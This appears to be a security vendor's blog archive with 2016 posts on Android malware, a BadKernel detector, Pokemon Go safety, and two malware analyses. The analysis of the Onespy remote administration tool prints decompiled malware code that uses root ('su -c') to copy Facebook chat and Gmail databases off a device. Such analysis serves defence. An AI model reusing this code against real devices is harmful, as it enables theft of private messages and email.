Top 5 Scariest Malware for Halloween

Happy Halloween! Trustlook has compiled a colorful Halloween Android malware infographic. Based on a study of 376,031 malware samples in the month of October, we have identified the Top 5 Scariest Malware families, and offer a close-up look of actual malicious apps. Here is what is in the infographic:

▪ Descriptions of the Top 5 Scariest Malware families
▪ Access to detailed reports (clickable) of 20 real malicious apps
▪ Tips to stay protected against malware

Click here to view to infographic.

 

 

Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. The Trustlook Mobile Security protection is triggered, and the app is uploaded to Trustlook’s cloud. But in some small instances Trustlook’s system has no prior knowledge of the app, so we consider it benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as a malware
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality.  It’s not possible to have full, 100% coverage. So to mitigate this security risks, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security  app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

Screenshot_2016-08-26-11-50-26         Screenshot_2016-08-26-11-50-33
The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not using the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests users not click on random links or links that appear suspicious. They also stress users keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.

Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of  8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

image00

Upon execution, the app persuades the user to grant device administrator access in order to maintain the persistence on the system:

 

image02


The app runs itself as a service in the background:

 

image01


From the screenshot below, the second “Settings” is cleverly disguised as the Remote Administration Tool (RAT) app:

 

image04


The app is developed by “www.onespy.in” and signed with the following certificate:

 

image03


Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the packages one chooses, the registered user can perform different functions and retrieve data from many popular apps. Data such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender

{

 private static boolean copyDB(String paramString1, String paramString2)

 {

   try

   {

     L.l(“fb copy:” + paramString1 + “;” + paramString2);

     paramString1 = “cp ” + paramString1 + ” ” + paramString2;

     int i = Runtime.getRuntime().exec(new String[] { “su”, “-c”, paramString1 }).waitFor();

     return i == 0;

   }

   catch (Exception paramString1)

   {

     L.l(paramString1);

   }

   return false;

 }

 

 private static String getName(String paramString)

 {

   try

   {

     paramString = new JSONObject(paramString).getString(“name”);

     return paramString;

   }

   catch (Exception paramString) {}

   return “”;

 }

[…]

 private static void sendThreadsTable(Context paramContext)

 {

   if (Environment.getExternalStorageState().equals(“mounted”)) {

     localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

   }

   for (;;)

   {

     str = localObject + “/fbdb2.db”;

     if (Environment.getExternalStorageState().equals(“mounted”))

     {

       localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

       localObject = localObject + “/fb_chat.csv”;

     }

     for (;;)

     {

       try

       {

         if (copyDB(“/data/data/com.facebook.katana/databases/threads_db2”, str))

         {

           L.l(“fbdb copied”);

           localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);

           localCursor = localSQLiteDatabase.rawQuery(“SELECT sender, text, timestamp_ms FROM messages”, null);

    […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader

{

 private static final String dbnamePrefix = “gmldbcp_”;

 

 private static String[] copyDB(Context paramContext)

 {

   Object localObject3;

   int i;

   int j;

   OutputStream localOutputStream;

   try

   {

     localObject1 = Runtime.getRuntime().exec(new String[] { “su”, “-c”, “find / -name mailstore*@gmail.com.db” }).getInputStream();

     Object localObject2 = new byte[660];

     localObject3 = new StringBuffer();

     for (;;)

     {

       i = ((InputStream)localObject1).read((byte[])localObject2);

       if (i == -1)

       {

         localObject2 = ((StringBuffer)localObject3).toString().split(“n”);

         localObject3 = new String[localObject2.length];

         j = 0;

         Process localProcess = Runtime.getRuntime().exec(“su”);

         localOutputStream = localProcess.getOutputStream();

         int k = localObject2.length;

         i = 0;

         if (i < k) {

           break;

         }

        […]

   String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf(‘/’) + 1, ((String)localObject1).lastIndexOf(‘@’));

   StringBuilder localStringBuilder = new StringBuilder(“cp “).append((String)localObject1).append(” “);

   if (Environment.getExternalStorageState().equals(“mounted”)) {}

   for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())

   {

     localOutputStream.write(((String)localObject1 + “/” + “gmldbcp_” + str + “.dbn”).getBytes());

     localObject3[j] = str;

     j += 1;

     i += 1;

     break;

   }

 }

      […]


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the linux system in an android device:

public class ExecShell {

   public enum SHELL_CMD {

       public static final enum SHELL_CMD check_su_binary;

 

       static {

           SHELL_CMD.check_su_binary = new SHELL_CMD(“check_su_binary”, 0, new String[]{“/system/xbin/which”,

                   “su”});

           SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};

       }

 

       private SHELL_CMD(String arg1, int arg2, String[] command) {

           super(arg1, arg2);

           this.command = command;

       }

 

       public static SHELL_CMD valueOf(String arg1) {

           return Enum.valueOf(SHELL_CMD.class, arg1);

       }

 

       public static SHELL_CMD[] values() {

           SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;

           int v1 = v0.length;

           SHELL_CMD[] v2 = new SHELL_CMD[v1];

           System.arraycopy(v0, 0, v2, 0, v1);

           return v2;

       }

   }


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

8 Facts You Have to Know for the Safest Pokemon Hunt

It’s capturing the world by storm. People are leaving their homes in droves and abandoning their normal lives in an attempt to catch them all. It is a Pokémon renaissance happening in 2016.  In the early hours of the morning and the wee hours of the night, mass droves of people are heading to parks and lakes. Poke stops, the designated landmarks designed to help Poke Masters refill on poke balls and other essentials, are frequented by the young and the old. With seemingly entire countries obsessed with the game, many security experts are concerned with the permissions and information accessed by the game. In addition, there are real-world dangers in playing the game. Here are the top 8 things you need to know about Pokemon Go in order to stay safe.


 

1)      Accessing your Google Account:

When first signing up for the popular game, a user has the option to sign up using their Google account or through a special Pokémon Trainers club. Simply for convenience’s sake, many people opt out for the Google account registration. This just requires the user to enter their Google account login, such as an email, and a password for their Google accounts. The issue with this is that the app then has unrestricted access to all forms of a user’s Google account. The user is required to give access to the app so that the game may be played, but a user is not alerted to what the app can access, which is why it is aptly named “Full Account Access”. This proves to be problematic as the app could theoretically access photo libraries and billing information.

2)      Camera Usage:

The app’s prized feature is an AR option that brings the Pokémon to life. In order to activate the augmented reality feature, a player must allow the app to access the personal device’s camera. The AR feature on the app is a huge draw for the players in the game, as it feels similar to reality. Using the AR feature, however, requires camera permission, which is another portal for possible data leakage. People take photos with the Pokémon but in turn end up capturing street addresses, car licenses plates, possible credit card information, and many other details.

3)      GPS Tracking: Location Location Location.

Pokémon Go is an app that utilizes a user’s GPS location and camera to support its gameplay. These two permissions, however, prove to be problematic when it comes to mobile security.  The game uses GPS to track where a player is and spawn the rare Pokémon when many players are clustered together. This proves to be a high security threat because a hacker can pinpoint a player’s precise whereabouts.

4)      Not watching where you’re going:

It’s been reported previously that people are having accidents left and right from obsessive game play. From players abandoning their cars in search of the most rare Pokémon to players falling off cliffs looking for an elusive Charmander, people are putting their safety as a secondary priority to the Hitmonchan hunt.

5)      Armed robbery      

Hackers aren’t the only criminals after the players in Pokemon Go. Robberies are happening all over because of the level of game play. These low life criminals drop lures on poke stops around different cities, meant to draw more Pokemon to the poke stop. Since these lures are public and visible within the app, many players will stop by these locations hoping to use these communal lures for their own Jigglypuff hunts. This helps round up potential victims and their valuable possessions into one common area, making for an easy trap.

6)      Downloading a third party app:

Previously, the Pokemon Go app was only available in selected countries and areas. With the craze going so strong in the United States, countries like England and Canada were feeling major FOMO. Many users turned to third party apps to obtain the game to play and join in the worldwide obsession. This is a steep slope to walk down, however. Many third party apps contain malware or phishing software. Added alongside the massive amount of permissions required to play the Pokemon App, this makes it a huge security threat.

7)     Fake Apps:

A new group of dangerous applications targeting Pokémon Go users by promising cheats, tips, and other functionality. Despite their innocuous-sounding titles, the apps actually contained malicious code that either tricked users into paying for expensive bogus services or took over victims’ phones to click porn ads, among other things.

8)      Trustlook:

To ensure your safety and privacy, researchers cannot recommend enough using a security application. Using an antivirus app that deeply scans and alerts you of any data breaches is vital during this kind of social frenzy. Trustlook can protect every player from all the threats of Pokemon Go and any other threat in the market. With ID Check, Boost, SD Card Scan, Backup and Restore, and many other features, Trustlook can make sure you stay safe while in hot pursuit of Pikachu.  Download the Trustlook app here on the Google Play store today.

Banking Trojan targets clients of Russian financial institutions

— Trustlook Research Team

Trojans are pieces of software that appear as legitimate applications while exhibiting malicious behavior. Banking Trojans are specifically designed to steal a user’s online banking credentials. The research banking trojan package, discovered and detected by Trustlook, can be identified as having the following characteristics:

  • MD5: d6d2427df4c03a7cc61c97b4eebdd655
  • SHA256: 1974c82877a3abdffa6f9246138a3819c2c543a9c904a753bea3663bd21d9239
  • Size: 577590 bytes
  • App name: 2ГИС (Russian)
  • Package name: ru.drink.lime

The package icon is:

Screen Shot 2016-06-17 at 11.22.11 AM

The app targets clients of Russian financial institutions, as such banking clients. The malware earmarks potential clients by using text written in the Russian language to create a false sense of security. The malware has the ability to receive commands that will send and intercept SMS messages. Using the account information and password, a hacker is able to validate a money transfer via SMS messaging commonly popular in Russia.

The app forces the user to grant the device admin to maintain the persistence on the system:

Screen Shot 2016-06-17 at 11.25.28 AM

If the user denies the device access or permission, the app enters a loop and keeps popping up the Activating admin window. The follow code snippets are used to perform the actions:

Screen Shot 2016-06-16 at 9.59.45 AM

After installation, the app removes its own  icon to hide from the user.

The app communicates with a remote server and sends out some personal information:

Screen Shot 2016-06-17 at 11.27.07 AM

The following code snippets demonstrate the above behaviours:

Screen Shot 2016-06-16 at 10.00.47 AM

The app checks for if the following packages are installed:

  • ru.sberbankmobile
  • com.android.vending
  • com.idamob.tinkoff.android
  • ru.vtb24.mobilebanking.android
  • ru.alfabank.mobile.android
  • ru.raiffeisennews

It then checks for if one of the above apps is running and starts service accordingly, to copy content found in forms used by legitimate financial institutions in their client apps.

Screen Shot 2016-06-17 at 11.28.20 AM

 

Screen Shot 2016-06-17 at 11.29.04 AM

The following is code snippets sample used by the malware to show the interface for “ru.sberbankmobile” banking app:

Screen Shot 2016-06-16 at 10.01.43 AM Screen Shot 2016-06-16 at 10.02.14 AM

The malware creates a SQL database to store the collected information, the table in the database has the following structure:

  • client_id integer
  • client_password TEXT
  • need_admin integer
  • need_card integer
  • first_bank integer
  • need_sber integer
  • need_tinkoff integer
  • need_vtb integer
  • need_alpha integer
  • need_raiff integer
  • server TEXT
  • filter TEXT
  • exist_bank_app integer

The malware is capable of communicating with the remote server to receive commands that will send/receive SMS message, the attacker can use this to do mobile fund transfers once they acquire the user’s banking credentials. The malware intercepts SMS messages and can abort the broadcast of the message so no new message delivery notifications are shown to the end user.

Screen Shot 2016-06-16 at 10.02.58 AM

This malware uses some instruction strings to communicate with a remote server, the strings are shown below:

  • taskUsssd
  • taskSms
  • deliverySms
  • okSmsSend
  • errorSmsSend